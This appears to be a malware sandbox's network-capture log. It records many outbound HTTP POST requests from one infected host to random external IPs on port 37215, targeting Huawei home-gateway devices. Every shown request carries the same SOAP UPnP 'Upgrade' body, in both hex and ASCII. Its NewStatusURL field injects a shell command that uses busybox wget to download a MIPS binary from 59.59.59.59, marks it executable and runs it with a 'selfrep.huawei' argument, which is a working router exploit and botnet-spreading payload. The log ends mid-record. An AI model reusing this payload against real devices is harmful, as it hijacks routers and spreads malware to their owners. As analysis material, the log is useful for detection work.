                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          501192.168.2.1538838197.216.135.2337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605511904 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          502192.168.2.153999841.27.78.23237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605539083 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          503192.168.2.154272634.175.204.24637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605604887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          504192.168.2.153798641.130.227.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605633020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          505192.168.2.156072837.167.235.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605644941 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          506192.168.2.1536848197.23.84.17137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605722904 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          507192.168.2.154036452.104.115.1937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605731964 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          508192.168.2.1533334157.193.172.3837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.611047029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          509192.168.2.153539686.25.196.3937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.611401081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          510192.168.2.155760641.223.17.6537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.611957073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 